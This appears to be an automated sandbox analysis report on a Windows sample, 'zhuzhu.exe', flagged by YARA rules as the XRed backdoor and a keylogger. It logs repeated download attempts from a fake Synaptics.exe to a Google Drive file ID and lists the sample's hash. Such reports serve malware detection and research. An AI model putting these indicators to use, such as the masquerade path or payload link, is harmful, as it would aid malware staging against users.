                                                                                                                                                                    Timestamp | Bytes transferred | Direction | Data
                                                                                                                                                                    2024-12-30 03:59:47 UTC | 387 | OUT | GET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                                                                    User-Agent: Synaptics.exe
                                                                                                                                                                    Cache-Control: no-cache
                                                                                                                                                                    Host: drive.usercontent.google.com
                                                                                                                                                                    Connection: Keep-Alive
                                                                                                                                                                    Cookie: NID=520=KZ7nPffwmFJuecPBYkTgj9o0Wg5xgIAtkZGmKeFEtVK_yIOnS3dX1hyC5NpZCfv0-4fpm_502tzUk1orbCiQoVAJo9C37QE_3LvtLcfGxAF8D3Oq1XIJNFGrxd4aflTZHQlukipdeVFIxx2i_7ZXQ_0JTnIe_5KuJkGrFW1bhZinXk3YLIXSJ04
                                                                                                                                                                    2024-12-30 03:59:47 UTC | 1250 | IN | HTTP/1.1 404 Not Found
                                                                                                                                                                    X-GUploader-UploadID: AFiumC7mvEOf972L3aJqtsYq6boVPpNe7EAHY2MpEzyaLbNDENn3FOy9m01YTUVYE68crJkKoqhDsYY
                                                                                                                                                                    Content-Type: text/html; charset=utf-8
                                                                                                                                                                    Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                                                                    Pragma: no-cache
                                                                                                                                                                    Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                                                                    Date: Mon, 30 Dec 2024 03:59:47 GMT
                                                                                                                                                                    Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                                                                    Content-Security-Policy: script-src 'report-sample' 'nonce-pButS8NVCnEgLrjmwBdgPg' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                                                                                    Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                                                                                    Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                                                                    Cross-Origin-Opener-Policy: same-origin
                                                                                                                                                                    Content-Length: 1652
                                                                                                                                                                    Server: UploadServer
                                                                                                                                                                    Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                                                    Content-Security-Policy: sandbox allow-scripts
                                                                                                                                                                    Connection: close
                                                                                                                                                                    2024-12-30 03:59:47 UTC | 140 | IN | Data Ascii: <html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error
                                                                                                                                                                    2024-12-30 03:59:47 UTC | 1390 | IN | Data Ascii: 404 (Not Found)!!1</title><style nonce="Cc2XceSjvx5Qjlp5-CUybw">*{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{color:#222;text-align:unset;margin:7% auto 0;max-width:390px;min-height:180px;
                                                                                                                                                                    2024-12-30 03:59:47 UTC | 122 | IN | Data Ascii: b> <ins>That’s an error.</ins><p>The requested URL was not found on this server. <ins>That’s all we know.</ins></main>


                                                                                                                                                                    Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                                                                                    143 | 192.168.2.4 | 49948 | 142.250.181.238 | 443 | 5780 | C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                                                    Timestamp | Bytes transferred | Direction | Data
                                                                                                                                                                    2024-12-30 03:59:47 UTC | 344 | OUT | GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                                                                    User-Agent: Synaptics.exe
                                                                                                                                                                    Host: docs.google.com
                                                                                                                                                                    Cache-Control: no-cache
                                                                                                                                                                    Cookie: NID=520=KZ7nPffwmFJuecPBYkTgj9o0Wg5xgIAtkZGmKeFEtVK_yIOnS3dX1hyC5NpZCfv0-4fpm_502tzUk1orbCiQoVAJo9C37QE_3LvtLcfGxAF8D3Oq1XIJNFGrxd4aflTZHQlukipdeVFIxx2i_7ZXQ_0JTnIe_5KuJkGrFW1bhZinXk3YLIXSJ04
                                                                                                                                                                    2024-12-30 03:59:47 UTC | 1314 | IN | HTTP/1.1 303 See Other
                                                                                                                                                                    Content-Type: application/binary
                                                                                                                                                                    Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                                                                    Pragma: no-cache
                                                                                                                                                                    Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                                                                    Date: Mon, 30 Dec 2024 03:59:47 GMT
                                                                                                                                                                    Location: https://drive.usercontent.google.com/download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download
                                                                                                                                                                    Strict-Transport-Security: max-age=31536000
                                                                                                                                                                    Cross-Origin-Opener-Policy: same-origin
                                                                                                                                                                    Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                                                                    Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                                                                                    Content-Security-Policy: script-src 'report-sample' 'nonce-XkwIP5uVCVybJP_4Zn-lRg' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                                                                                    Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                                                                    Server: ESF
                                                                                                                                                                    Content-Length: 0
                                                                                                                                                                    X-XSS-Protection: 0
                                                                                                                                                                    X-Frame-Options: SAMEORIGIN
                                                                                                                                                                    X-Content-Type-Options: nosniff
                                                                                                                                                                    Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                                                    Connection: close


                                                                                                                                                                    Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                                                                                    144 | 192.168.2.4 | 49950 | 142.250.181.238 | 443 | 5780 | C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                                                    Timestamp | Bytes transferred | Direction | Data
                                                                                                                                                                    2024-12-30 03:59:48 UTC | 344 | OUT | GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                                                                    User-Agent: Synaptics.exe
                                                                                                                                                                    Host: docs.google.com
                                                                                                                                                                    Cache-Control: no-cache
                                                                                                                                                                    Cookie: NID=520=KZ7nPffwmFJuecPBYkTgj9o0Wg5xgIAtkZGmKeFEtVK_yIOnS3dX1hyC5NpZCfv0-4fpm_502tzUk1orbCiQoVAJo9C37QE_3LvtLcfGxAF8D3Oq1XIJNFGrxd4aflTZHQlukipdeVFIxx2i_7ZXQ_0JTnIe_5KuJkGrFW1bhZinXk3YLIXSJ04
2024-12-30 03:59:48 UTC | 1314 | IN | HTTP/1.1 303 See Other
                                                                                                                                                                    Content-Type: application/binary
                                                                                                                                                                    Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                                                                    Pragma: no-cache
                                                                                                                                                                    Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                                                                    Date: Mon, 30 Dec 2024 03:59:48 GMT
                                                                                                                                                                    Location: https://drive.usercontent.google.com/download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download
                                                                                                                                                                    Strict-Transport-Security: max-age=31536000
                                                                                                                                                                    Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                                                                    Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                                                                                    Content-Security-Policy: script-src 'report-sample' 'nonce-7E62DCfIJreXVCcQ4l7mag' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                                                                                    Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                                                                    Cross-Origin-Opener-Policy: same-origin
                                                                                                                                                                    Server: ESF
                                                                                                                                                                    Content-Length: 0
                                                                                                                                                                    X-XSS-Protection: 0
                                                                                                                                                                    X-Frame-Options: SAMEORIGIN
                                                                                                                                                                    X-Content-Type-Options: nosniff
                                                                                                                                                                    Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                                                    Connection: close


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
145 | 192.168.2.4 | 49951 | 142.250.186.129 | 443 | 5780 | C:\ProgramData\Synaptics\Synaptics.exe
Timestamp | Bytes transferred | Direction | Data
2024-12-30 03:59:48 UTC | 387 | OUT | GET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                                                                    User-Agent: Synaptics.exe
                                                                                                                                                                    Cache-Control: no-cache
                                                                                                                                                                    Host: drive.usercontent.google.com
                                                                                                                                                                    Connection: Keep-Alive
                                                                                                                                                                    Cookie: NID=520=KZ7nPffwmFJuecPBYkTgj9o0Wg5xgIAtkZGmKeFEtVK_yIOnS3dX1hyC5NpZCfv0-4fpm_502tzUk1orbCiQoVAJo9C37QE_3LvtLcfGxAF8D3Oq1XIJNFGrxd4aflTZHQlukipdeVFIxx2i_7ZXQ_0JTnIe_5KuJkGrFW1bhZinXk3YLIXSJ04
2024-12-30 03:59:48 UTC | 1250 | IN | HTTP/1.1 404 Not Found
                                                                                                                                                                    X-GUploader-UploadID: AFiumC4CDWvYQOyVlgqZx2m9j5O0OsBbK2Lh2yXhIu0NkWEC4eSrNQsaZ7JK-tsaEK45r03iMkGiEUo
                                                                                                                                                                    Content-Type: text/html; charset=utf-8
                                                                                                                                                                    Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                                                                    Pragma: no-cache
                                                                                                                                                                    Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                                                                    Date: Mon, 30 Dec 2024 03:59:48 GMT
                                                                                                                                                                    Cross-Origin-Opener-Policy: same-origin
                                                                                                                                                                    Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                                                                    Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                                                                    Content-Security-Policy: script-src 'report-sample' 'nonce-ss4z_i2c6dAdE-eS-wHAQQ' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                                                                                    Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                                                                                    Content-Length: 1652
                                                                                                                                                                    Server: UploadServer
                                                                                                                                                                    Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                                                    Content-Security-Policy: sandbox allow-scripts
                                                                                                                                                                    Connection: close
2024-12-30 03:59:48 UTC | 140 | IN | Data Ascii: <html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error
2024-12-30 03:59:48 UTC | 1390 | IN | Data Ascii: 404 (Not Found)!!1</title><style nonce="lbImvBkgb_ezpmZOzu3wqw">*{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{color:#222;text-align:unset;margin:7% auto 0;max-width:390px;min-height:180px;
2024-12-30 03:59:48 UTC | 122 | IN | Data Ascii: b> <ins>Thats an error.</ins><p>The requested URL was not found on this server. <ins>Thats all we know.</ins></main>


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
146 | 192.168.2.4 | 49953 | 142.250.181.238 | 443 | 5780 | C:\ProgramData\Synaptics\Synaptics.exe
Timestamp | Bytes transferred | Direction | Data
2024-12-30 03:59:48 UTC | 344 | OUT | GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                                                                    User-Agent: Synaptics.exe
                                                                                                                                                                    Host: docs.google.com
                                                                                                                                                                    Cache-Control: no-cache
                                                                                                                                                                    Cookie: NID=520=KZ7nPffwmFJuecPBYkTgj9o0Wg5xgIAtkZGmKeFEtVK_yIOnS3dX1hyC5NpZCfv0-4fpm_502tzUk1orbCiQoVAJo9C37QE_3LvtLcfGxAF8D3Oq1XIJNFGrxd4aflTZHQlukipdeVFIxx2i_7ZXQ_0JTnIe_5KuJkGrFW1bhZinXk3YLIXSJ04
2024-12-30 03:59:48 UTC | 1314 | IN | HTTP/1.1 303 See Other
                                                                                                                                                                    Content-Type: application/binary
                                                                                                                                                                    Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                                                                    Pragma: no-cache
                                                                                                                                                                    Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                                                                    Date: Mon, 30 Dec 2024 03:59:48 GMT
                                                                                                                                                                    Location: https://drive.usercontent.google.com/download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download
                                                                                                                                                                    Strict-Transport-Security: max-age=31536000
                                                                                                                                                                    Content-Security-Policy: script-src 'report-sample' 'nonce-XI2aCXThRaEkor-HilKdWw' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                                                                                    Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                                                                                    Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                                                                    Cross-Origin-Opener-Policy: same-origin
                                                                                                                                                                    Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                                                                    Server: ESF
                                                                                                                                                                    Content-Length: 0
                                                                                                                                                                    X-XSS-Protection: 0
                                                                                                                                                                    X-Frame-Options: SAMEORIGIN
                                                                                                                                                                    X-Content-Type-Options: nosniff
                                                                                                                                                                    Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                                                    Connection: close


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
147 | 192.168.2.4 | 49952 | 142.250.186.129 | 443 | 5780 | C:\ProgramData\Synaptics\Synaptics.exe
Timestamp | Bytes transferred | Direction | Data
2024-12-30 03:59:48 UTC | 387 | OUT | GET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                                                                    User-Agent: Synaptics.exe
                                                                                                                                                                    Cache-Control: no-cache
                                                                                                                                                                    Host: drive.usercontent.google.com
                                                                                                                                                                    Connection: Keep-Alive
                                                                                                                                                                    Cookie: NID=520=KZ7nPffwmFJuecPBYkTgj9o0Wg5xgIAtkZGmKeFEtVK_yIOnS3dX1hyC5NpZCfv0-4fpm_502tzUk1orbCiQoVAJo9C37QE_3LvtLcfGxAF8D3Oq1XIJNFGrxd4aflTZHQlukipdeVFIxx2i_7ZXQ_0JTnIe_5KuJkGrFW1bhZinXk3YLIXSJ04
2024-12-30 03:59:48 UTC | 1243 | IN | HTTP/1.1 404 Not Found
                                                                                                                                                                    X-GUploader-UploadID: AFiumC7GdMQ_1GDU9YW0PeH4Dg-MLrL-KdDH169tClcsZOrOKxxQwpPPd9XAVD40dDwz2O6S
                                                                                                                                                                    Content-Type: text/html; charset=utf-8
                                                                                                                                                                    Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                                                                    Pragma: no-cache
                                                                                                                                                                    Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                                                                    Date: Mon, 30 Dec 2024 03:59:48 GMT
                                                                                                                                                                    Cross-Origin-Opener-Policy: same-origin
                                                                                                                                                                    Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                                                                                    Content-Security-Policy: script-src 'report-sample' 'nonce-579eDfgSk3tWZ5pZzvWEyw' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                                                                                    Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                                                                    Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                                                                    Content-Length: 1652
                                                                                                                                                                    Server: UploadServer
                                                                                                                                                                    Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                                                    Content-Security-Policy: sandbox allow-scripts
                                                                                                                                                                    Connection: close
2024-12-30 03:59:48 UTC | 147 | IN | Data Ascii: <html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (No
2024-12-30 03:59:48 UTC | 1390 | IN | Data Ascii: t Found)!!1</title><style nonce="6_iEk5OOBcM11KBsxm2hrA">*{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{color:#222;text-align:unset;margin:7% auto 0;max-width:390px;min-height:180px;padding
2024-12-30 03:59:48 UTC | 115 | IN | Data Ascii: >Thats an error.</ins><p>The requested URL was not found on this server. <ins>Thats all we know.</ins></main>


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
148 | 192.168.2.4 | 49955 | 142.250.181.238 | 443 | 5780 | C:\ProgramData\Synaptics\Synaptics.exe
Timestamp | Bytes transferred | Direction | Data
2024-12-30 03:59:49 UTC | 344 | OUT | GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                                                                    User-Agent: Synaptics.exe
                                                                                                                                                                    Host: docs.google.com
                                                                                                                                                                    Cache-Control: no-cache
                                                                                                                                                                    Cookie: NID=520=KZ7nPffwmFJuecPBYkTgj9o0Wg5xgIAtkZGmKeFEtVK_yIOnS3dX1hyC5NpZCfv0-4fpm_502tzUk1orbCiQoVAJo9C37QE_3LvtLcfGxAF8D3Oq1XIJNFGrxd4aflTZHQlukipdeVFIxx2i_7ZXQ_0JTnIe_5KuJkGrFW1bhZinXk3YLIXSJ04
2024-12-30 03:59:49 UTC | 1314 | IN | HTTP/1.1 303 See Other
                                                                                                                                                                    Content-Type: application/binary
                                                                                                                                                                    Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                                                                    Pragma: no-cache
                                                                                                                                                                    Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                                                                    Date: Mon, 30 Dec 2024 03:59:49 GMT
                                                                                                                                                                    Location: https://drive.usercontent.google.com/download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download
                                                                                                                                                                    Strict-Transport-Security: max-age=31536000
                                                                                                                                                                    Cross-Origin-Opener-Policy: same-origin
                                                                                                                                                                    Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                                                                                    Content-Security-Policy: script-src 'report-sample' 'nonce-NWqMY8td4vgJVgLBaNQyXg' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                                                                                    Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                                                                    Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                                                                    Server: ESF
                                                                                                                                                                    Content-Length: 0
                                                                                                                                                                    X-XSS-Protection: 0
                                                                                                                                                                    X-Frame-Options: SAMEORIGIN
                                                                                                                                                                    X-Content-Type-Options: nosniff
                                                                                                                                                                    Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                                                    Connection: close


                                                                                                                                                                    Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                                                                                    149 | 192.168.2.4 | 49956 | 142.250.186.129 | 443 | 5780 | C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                                                    Timestamp | Bytes transferred | Direction | Data
                                                                                                                                                                    2024-12-30 03:59:49 UTC | 387 | OUT | GET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                                                                    User-Agent: Synaptics.exe
                                                                                                                                                                    Cache-Control: no-cache
                                                                                                                                                                    Host: drive.usercontent.google.com
                                                                                                                                                                    Connection: Keep-Alive
                                                                                                                                                                    Cookie: NID=520=KZ7nPffwmFJuecPBYkTgj9o0Wg5xgIAtkZGmKeFEtVK_yIOnS3dX1hyC5NpZCfv0-4fpm_502tzUk1orbCiQoVAJo9C37QE_3LvtLcfGxAF8D3Oq1XIJNFGrxd4aflTZHQlukipdeVFIxx2i_7ZXQ_0JTnIe_5KuJkGrFW1bhZinXk3YLIXSJ04
                                                                                                                                                                    2024-12-30 03:59:49 UTC | 1250 | IN | HTTP/1.1 404 Not Found
                                                                                                                                                                    X-GUploader-UploadID: AFiumC6lavYSCKeZOPKz9eekJVvbGN-ABVDa0KgtmX5JptBia-Tw3MYy7g3P8jWYn4rJKwTz_oQlwy4
                                                                                                                                                                    Content-Type: text/html; charset=utf-8
                                                                                                                                                                    Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                                                                    Pragma: no-cache
                                                                                                                                                                    Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                                                                    Date: Mon, 30 Dec 2024 03:59:49 GMT
                                                                                                                                                                    Cross-Origin-Opener-Policy: same-origin
                                                                                                                                                                    Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                                                                    Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                                                                    Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                                                                                    Content-Security-Policy: script-src 'report-sample' 'nonce-uffd8JR1FjutwqX9uTI8ug' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                                                                                    Content-Length: 1652
                                                                                                                                                                    Server: UploadServer
                                                                                                                                                                    Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                                                    Content-Security-Policy: sandbox allow-scripts
                                                                                                                                                                    Connection: close
                                                                                                                                                                    2024-12-30 03:59:49 UTC | 140 | IN | Data Raw: 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 64 69 72 3d 6c 74 72 3e 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20
                                                                                                                                                                    Data Ascii: <html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error
                                                                                                                                                                    2024-12-30 03:59:49 UTC | 1390 | IN | Data Raw: 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 20 6e 6f 6e 63 65 3d 22 48 47 65 44 33 6c 47 43 62 66 5a 6b 68 36 4c 4e 4a 56 42 31 4d 51 22 3e 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 7d 68 74 6d 6c 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 66 66 3b 63 6f 6c 6f 72 3a 23 32 32 32 3b 70 61 64 64 69 6e 67 3a 31 35 70 78 7d 62 6f 64 79 7b 63 6f 6c 6f 72 3a 23 32 32 32 3b 74 65 78 74 2d 61 6c 69 67 6e 3a 75 6e 73 65 74 3b 6d 61 72 67 69 6e 3a 37 25 20 61 75 74 6f 20 30 3b 6d 61 78 2d 77 69 64 74 68 3a 33 39 30 70 78 3b 6d 69 6e 2d 68 65 69 67 68 74 3a 31 38 30 70 78 3b
                                                                                                                                                                    Data Ascii: 404 (Not Found)!!1</title><style nonce="HGeD3lGCbfZkh6LNJVB1MQ">*{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{color:#222;text-align:unset;margin:7% auto 0;max-width:390px;min-height:180px;
                                                                                                                                                                    2024-12-30 03:59:49 UTC | 122 | IN | Data Raw: 62 3e 20 3c 69 6e 73 3e 54 68 61 74 e2 80 99 73 20 61 6e 20 65 72 72 6f 72 2e 3c 2f 69 6e 73 3e 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 20 3c 69 6e 73 3e 54 68 61 74 e2 80 99 73 20 61 6c 6c 20 77 65 20 6b 6e 6f 77 2e 3c 2f 69 6e 73 3e 3c 2f 6d 61 69 6e 3e
                                                                                                                                                                    Data Ascii: b> <ins>Thats an error.</ins><p>The requested URL was not found on this server. <ins>Thats all we know.</ins></main>



                                                                                                                                                                    Target ID:0
                                                                                                                                                                    Start time:22:58:57
                                                                                                                                                                    Start date:29/12/2024
                                                                                                                                                                    Path:C:\Users\user\Desktop\zhuzhu.exe
                                                                                                                                                                    Wow64 process (32bit):true
                                                                                                                                                                    Commandline:"C:\Users\user\Desktop\zhuzhu.exe"
                                                                                                                                                                    Imagebase:0x400000
                                                                                                                                                                    File size:6'061'056 bytes
                                                                                                                                                                    MD5 hash:675F03DB23D403573A3A6F708A0E4369
                                                                                                                                                                    Has elevated privileges:true
                                                                                                                                                                    Has administrator privileges:true
                                                                                                                                                                    Programmed in:Borland Delphi
                                                                                                                                                                    Yara matches:
                                                                                                                                                                    • Rule: JoeSecurity_XRed, Description: Yara detected XRed, Source: 00000000.00000000.1657184118.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Author: Joe Security
                                                                                                                                                                    • Rule: JoeSecurity_DelphiSystemParamCount, Description: Detected Delphi use of System.ParamCount(), Source: 00000000.00000000.1657184118.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Author: Joe Security
                                                                                                                                                                    • Rule: JoeSecurity_Keylogger_Generic, Description: Yara detected Keylogger Generic, Source: 00000000.00000000.1657356123.00000000004A5000.00000002.00000001.01000000.00000003.sdmp, Author: Joe Security
                                                                                                                                                                    • Rule: JoeSecurity_DelphiSystemParamCount, Description: Detected Delphi use of System.ParamCount(), Source: 00000000.00000000.1657356123.00000000004A5000.00000002.00000001.01000000.00000003.sdmp, Author: Joe Security
